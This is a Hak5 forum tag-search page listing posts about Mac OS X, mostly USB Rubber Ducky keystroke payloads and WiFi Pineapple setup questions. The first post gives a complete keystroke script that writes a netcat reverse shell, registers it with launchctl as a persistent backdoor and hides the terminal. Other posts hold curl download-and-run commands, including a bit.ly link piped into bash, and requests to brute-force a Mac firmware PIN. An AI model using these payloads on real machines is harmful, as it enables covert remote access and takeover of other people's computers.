Jump to content

Search the Community

Showing results for tags 'mac'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host ( on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y
  2. I've recently been installing quite a couple virtual machines to try out my little duckies (nothing to say about the windows scripts, they work wonders and we have plenty of feedback on that part). Yet, I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject. All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in terminal will bypass that for a simple app installation. I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps. I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their codes to make it work, and have been changing remotely the language used both by the duckencoder 2.6.3 (or whatever version it is) for canada french, english (us-french), canada english, have been also transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked. Everytime I started the code DELAY 1000 COMMAND SPACE The space command seems to be working good at least haha, does open the top-right corner prompt DELAY 800 STRING Terminal Here starts the problem. Terminal comes out as something like IAELtmin, tried making a sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem. DELAY 500 ENTER Problem number 2 : Despite the weird wording, it doesnt even press enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesnt, which is weird. DELAY 500 STRING curl http://SERVER/path/to/file.app > file.app ENTER DELAY 2000 (give it some time to download it) STRING open -a file ENTER And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together. Now I've been working with iAtkos if anyone is familiar with it, all setup good, and have worked hours and tried many different variables to make this work but the foundations itself don't wok (even the online encoder couldn't give me a good inject.bin output on the field) So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem? Also, on a sidenote, living in a french-canadian area where I have no clue which language my friends have, I was wondering if the canadian keyboard was unilateral, same for everyone, and if, whether they are writing in english or french the payload should work anyways (all with canadian keyboards, all QWERTY, simply ctrl+shift changes the key mapping from french to english). Anyways, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows. Thanks in advance! -domino
  3. Hi, I have a bit of a newbie question so thanks in advance for any replies. I have just ordered my first pineapple. Will the mark V automatically connect to a Mac OSX via ethernet? I'm not talking about sharing an internet connection at this point, but just accessing the pineapples web interface? I cannot find any information online. Even the Wiki page related to this in empty: http://wiki.wifipineapple.com/index.php/OSX_ICS Thanks.
  4. Okay so i am going to get the MSI GT60 0NF-612US laptop an i wanted to know if i could run OSX in virtual box on it...... I am only asking because when i tried it on my dell inspiron 1545 it said that i had the wrong processor or something so idk if it would work in laptop im going to get or not.... Does any one actually know why it didnt work? And will it work with this processor? Windows 7 Professional/ Intel Core i7-3630QM Processor I really just want to have the best of both worlds mac when i need it and windows when i dont!!!! Any help would be apriciated! -Thanks
  5. Hello again I made another payload for mac osx. This one will print any file from the internet (You can delet the "curl -o" command to print a local file). I you dont want it to delete the printed file, just remove the "-r". But other wise you only have to replace the bracets() and whats inside of them with your configuration. Please reply, doesn't matter what you say. I just want to see if I am wasting my time about something that no one cares about. DELAY 2000 GUI SPACE DELAY 500 STRING Terminal DELAY 1000 ENTER DELAY 1000 curl -O (here put a link to a photo of file to download or delete the command to print a local file ex. trollface.com/troll.jpg) ENTER DELAY 2000 (change this delay to adjust your internet download speed/the file size) STRING lpr -P (here put the name of the printer ex. Hp-officejet) -# (here put the number of copies) -r (here navigate to the photo or file. Its in your home folder or home directory. ex. /home/jake/photo) ENTER DELAY 3000 Command-Q
  6. Hi !! I have a question ! Now that SimCity is playable offline, isn't it possible to hack it ? Especially for Mac ;) Thx
  7. This is a modified version of the OS X Youtube blaster. That one's link format no longer autoplays. This one also loops because why would you want to only listen to it once? If Rick's not your style, just swap the video id (oHg5SJYRHA0 in this case) for whatever you'd like. DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 2000 ENTER DELAY 1000 STRING osascript -e 'set volume 7' ENTER STRING open https://youtube.googleapis.com/v/oHg5SJYRHA0%26autoplay=1%26loop=1 ENTER
  8. Hey guys, If anyone's aware of THC's IPV6 attack suite against the IPV6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on linux natively, the readme suggests they will not work on OS X. Are there any alternative methods for router flooding from native OS X? Thanks
  9. Hoping someone can help me here. I just received my USB Rubber Ducky in the mail and I'm stuck as the Keyboard Setup Assistant wants me to identify the keyboard before it will allow me to continue if I plug the ducky in. The only way I can think of getting around this is to put a delay in to allow me to click "Continue" and then program the corresponding keys in my script to get through the assistant before executing any other commands. This is not ideal though. Does anyone know of a way around this issue? I am running OS X 10.8.3 by the way. Any help would be greatly appreciated.
  10. This is my first payload - it works with Mavericks and doesn't require any password input. It downloads a 1920x1080 trollface picture and sets it as the desktop background. If you want a different picture just change the url. And if you want the new picture to have a relevant filename, make sure you change it on both the "curl" and "osascript" lines DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 2000 ENTER DELAY 1000 STRING cd ../Shared ENTER STRING curl -o 'trollface.jpg' 'http://khongthe.com/wallpapers/entertainment/trollface-1080p-32389.jpg' ENTER STRING osascript -e 'tell application "Finder" to set desktop picture to POSIX file "/Users/Shared/trollface.jpg"' ENTER edit: After trying different combinations of delays, I found the above to have the most consistent success out of the several I tried (still not applaudable though). The whole comand-space, search, launch process on OS X seems to be a bit fickle. Does anyone have any tips to shave time off and/or have it be more consistently successful?
  11. Hi ! I know that you can already find a small number of payloads on Github, but there are many more that have been created by the community. For example, we found none for Android on GitHub. And, I have experienced the difficulty to find exactly what I need ;) That's why I think it would be a good initiative to gather as much as possible payloads on this topic. If you have created an effective and fun on, or if you use regularly one made by another member, why not post it below to share it ? (select those who are not already on GitHub for the moment please) If you are interested, try to complete a short form of this type and post it below. Title : Author : Target : Description : Obviously, if it does not seem to be a good idea, let me know -_-
  12. Hi Everyone, I'm trying to use a pipe symbol ( | ) on a french mac keyboard. The key combination to do it is Shift+Alt+L What I want to print in a terminal is : curl -L http://bit.ly/10hA8iC | bash (which by the way is really fun, it plays a rickroll inside the mac terminal ! ) All my script is working great, but the only issue is that pipe symbol. I've tried several things, like : STRING curl -L http://bit.ly/10hA8iC | bash or STRING curl -s -L http://bit.ly/10hA8iC SPACE DELAY 20 ALT-SHIFT l DELAY 20 SPACE DELAY 20 STRING bash DELAY 50 ENTER I saw a forum post saying that maybe the rubberducky can't handle 3 key combination, so I don't know... If anyone has an idea or at least the same pb... Maybe I'm missing something obvious here, so excuse me for my noobness (& my english ! ) Thanks a lot Wook
  13. Hi all, Just got my first USB Rubber Ducky and decided to write a payload to prank some friends. REM Title: OSX background changer REM This payload will open terminal, download an image to the default desktop REM pictures directory, set it as the background then kill the dock to REM refresh the background. It also closes the terminal window. DELAY 3000 GUI SPACE STRING terminal DELAY 200 ENTER DELAY 200 STRING cd /Library/Desktop\ Pictures DELAY 200 ENTER STRING curl -s -O http://YOUR_URL_HERE/1.jpg ENTER DELAY 2000 STRING defaults write com.apple.desktop Background '{default = {ImageFilePath = "/Library/Desktop Pictures/1.jpg";};}' ENTER DELAY 200 STRING killall Dock ENTER STRING killall Terminal ENTER Be sure to put in a valid URL of the image you want to set as the background. This works best if you're using the latest firmware with the vidpid.bin file set to 05ac 0202. It's my first payload, so if you see anything the matter, please let me know. L
  14. Should the br-lan, wlan0 and eth0 have the same MAC address?? As mine does. Should these not be different??
  15. The instructions in the manual are straight forward (RTFM), however what is the format for the MAC address when you enter it as a Client Blacklist? With the colons, dashes or none? And is there another way to list them via SSH, etc.?
  16. Hey everyone, I created payload to find MacBook Air efi 4 digit PIN, but the problem is that after 3 wrong attempts you have to wait 1 minute. After 3 other attempts 5 minutes, and then 15 minutes and so on... Is there another way to find that dam'n PIN? My script was like this: STRING 0000 ENTER DELAY 1000 STRING 0001 ENTER DELAY 1000 STRING 0002 ENTER DELAY 1000 and when I enter the 3-rd PIN wrong I have to wait
  17. Does anyone have the payload (or script) to brute force Mac's efi 4-digit pin? I would really appreciate it...
  18. Hey gang! Wanted to share this cool little script I ran into for updating your Facebook Status with Bash! B) For Linux and (Get ready) Mac OS X http://360percents.com/posts/bash-script-to-update-facebook-status-linux-mac-os-x/
  19. I cannot connect to the Pineapple's web-based control center on a Mac OS X. I have followed the instructions provided by Chris Haralson's tutorial (link shown below), but, when I enter the ip address, nothing happens! Can someone help me out? Thanks in advance! Link: "How to: Configure a Wifi Pineapple for use with Mac OS X" Steps: (i) In the "Network" tab, I set the service order (wifi above the ethernet) (ii) Manually configured the ethernet as IPv4 address : Subnet Mask : Router: (blank) Dns server: (iii). In the "Sharing" tab, i checked internet sharing with sharing from "wifi" to "ethernet" (iv). Powered up the Pineapple Mark IV and connected it's PoE LAN port to my Mac OS X 10.8.4 64-bits kernel (Intel-based) (v). Opened web browser (Safari Version 6.0.5) and entered the ip address Nothing happens here!
  20. Hey, looking at the examples on github and on the forums, I see a lot of fun payloads for windows, but almost none for mac and 0 linux. Are there any cool Linux/Mac payloads out there that I should check out?
  21. Hi Guys, I'm seeking help and would like to have a discussion about booting Linux on Apple hardware using an EFI boot loader. Probably not going to be a popular suggestion considering one of your sponsors is System76 but I thought I'd give it a try regardless. I came across a great tool called "Mac Linux USB Loader" which is still under heavy development. "This is the Mac Linux USB Loader, a tool allowing you to take an ISO of a Linux distribution and make it boot using EFI." http://sevenbits.github.io/Mac-Linux-USB-Loader/ https://github.com/SevenBits/Mac-Linux-USB-Loader I spoke to "SevenBits" the developer and there's an unresolved problem he hasn't been able to fix, which affects myself and others who use older Macbook Pro hardware (late 2008 4,1 and others). "I actually have an early 2008 MacBook Pro which also fails to boot Linux. I test the bootable drives my tool creates on a newer, separate machine. I believe with 90% certainty that the reason for this problem is the lack of Linux kernel mode setting (KMS) support in Apple's EFI firmware, which is required for nVidia video drivers to function properly. Disabling KMS in the boot options of most distros actually causes the splash screen to show up, but then X (the graphical windowing system used to provide a desktop) can't start because KMS is disabled, and so you are dropped into the terminal with a bash shell. If you like command line Ubuntu, this is fine, you can just connect to the web via Ethernet (and even install WiFi drivers) and go, but for 90% of us, this is an inadequate solution." Have you, or anyone you know had success finding a solution to this problem? Thanks, cryptomule
  22. Hey guys, I would like to go about creating a payload for the Rubber Ducky that pretty much does the same thing as the *RunEXE from SD* payload but on OSX using a .JAR file. How would I do this? The payload for EXE files on windows uses a batch file that waits for the SD card to be mounted but OSX doesn't use batch files? Sorry for my inexperience, I am both a Windows and a Kali user but need this payload for penetration testing on Macs. I think the only alternative would be to open a OSX backdoor and download and run the file in terminal. I would rather not resort to this though because if I was trying to install on multiple machines I would have to change the listening port every time to download the file. A little more time consuming and inefficient compared to a straight SD card transfer and run.
  23. I'm new to the Pineapple but I love it so far. Just thought I'd share a process to get Internet Connection Sharing working in MAC OSX without having to make manual edits to the Pineapple as the Wiki states. This requires the Network Manager infusion be installed. Step 1: Connect MAC wifi to your Internet connected AP Step 2: Ensure to "Set Service Order" under the Network preferences, put the Wifi above the Ethernet Step 3: Also in Network prefs set the IP address of the Ethernet connection manually -, subnet is, router is blank, and DNS is Step 4: Plug the cat5 cable into the WAN/LAN port on the pineapple Step 5: Go to "Sharing" in System Prefs, in "Internet Sharing" set WiFi to Ethernet, check the box and hit start. ( this step will assign an IP address of to the WAN/LAN port, this is visible on the pineapple's Status page. ) Step 6: In the network manager infusion go to the ICS tab, set Share Internet From eth1 to wlan0 (or br-lan in some instances) then click save. The only thing unique with my setup is my Air doesn't have an NIC port so I'm using a USB to Ethernet adapter. It should be obvious but I used a different device connected to the pineapple AP to make changes while my Air was in use. You could use a different laptop and connect to the LAN/POE port but an iPad or tablet with wifi works just fine. Please let me know if this works for you. If it does maybe this can be added to the Wiki. Thanks, thesugarat
  24. Hello all, I stumbled across the hak5 store today, and after reading about the Wifi Pineapple I think I'm going to order one soon. My current computer is a Macbook Pro running OSX 10.7.4. I also have an Ubuntu 12.04 VM (VirtualBox). Will I be able to configure and work with the Wifi Pineapple easily enough? From what I've read, trying to use OSX can be difficult and Linux is preferred, but I'm wondering if trying to configure the Wifi Pineapple with a VM brings about any extra complications. I also have a laptop running Windows 7, if that would be the easiest option. However it's a work computer, so I'd rather not, if possible. Hopefully this question's not too vague, if there's other information I should be providing, please let me know! Thanks.
  25. Hi All, First time user here and before I ask my question I'd just like to say a big thankyou to all the people who have worked on the MKIV and the people who contribute to the forums and wikis. I bought myself an ap121u and flashed it in no time at all with little prior experience, couldnt have been easier. I've used a script provided by lsc on these forums to get my internet tethering via wifi and an alfa dongle working great, apart from one thing. Doesnt seem to change the mac address of the above mentioned dongle. Ive tried doing it manually and also setting a mac as per below. Ifconfig wlan1 down macchanger -m 00:11:22:33:44:55 wlan1 ifconfig wlan1 up Comes up with the error ERROR: Can't change MAC: interface up or not permission: Invalid argument after trying to change. Any ideas? Im probably overlooking something simple. I havent tried changing wlan0 yet but i guess that will be fine, is it because im not using the supported dongle? Driver issue? A point in the right direction or any help would be great. Thanks again Tom.
  • Create New...